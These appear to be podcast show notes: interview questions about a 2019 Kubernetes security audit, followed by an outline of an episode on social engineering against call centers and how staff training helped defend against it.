RBAC (which roles were tested? Just admin/non-admin *best practice is no admin/least priv*)

Secrets

Namespace traversals

Namespace claims

Methodology:

Set up a bunch of environments?

Primarily set up a single environment IIRC

Combination of code audit and active ?fuzzing?

What does one fuzz on a K8s environment?

Tested with latest alpha or production versions?

Version 1.13 or 1.14 - version locked at whatever was current - K8S releases a new version every 3 months, so this is a challenge and means we have to keep auditing.

Tested multiple different types of k8s implementations?

Tested primarily against kubespray (https://github.com/kubernetes-sigs/kubespray)

Bug Bounty program:

https://github.com/kubernetes/community/blob/master/contributors/guide/bug-bounty.md

Aug 31 2019

47mins

2019-031- Dissecting a Social engineering attack (Part 2)

Intro - Ms. DirInfosec “Anna”

Call centers are torn between wanting to give good customer service and needing to move the call along.

    Metrics are tailored to support an environment conducive to these kinds of attacks

https://en.wikipedia.org/wiki/Social_engineering_(security)

Social engineering will prey on people’s altruism 

    “Pregnant woman needing help through the security door”

    “Person on crutches”

    “Delivery person with arms full”

    “Can’t remember information, others filling in missing bits”

    Call center reps are _paid_ to be helpful. “The customer is never wrong”

Creating a sense of urgency to spur action

Real-life scenario: "bob calls asking about status of an order"

Questions:

  1. What were you doing for training prior to these calls? (It’s alright if you weren’t doing anything.) :)

     Pre-training audio (#1 and #2)

  2. What was their reaction to the calls they received?

  3. Did the training take the first time?
     1. What difficulties did you have after the first training?
     2. ‘Getting better’ audio (#3)
        1. Fake calls?
        2. Show examples?
  4. Talk about the training, and what kind of training:
     1. Post-training audio (#4 and #5)
  5. How did your call center reps handle the training?
  6. From a business standpoint, what had to be changed to accommodate the new processes?

https://www.pindrop.com/blog/tackling-113-fraud-increase-call-centers-webinar-recap/

https://www.bai.org/banking-strategies/article-detail/beating-crooks-at-call-center-fraud

@consultingCSO on twitter

Aug 16 2019

50mins
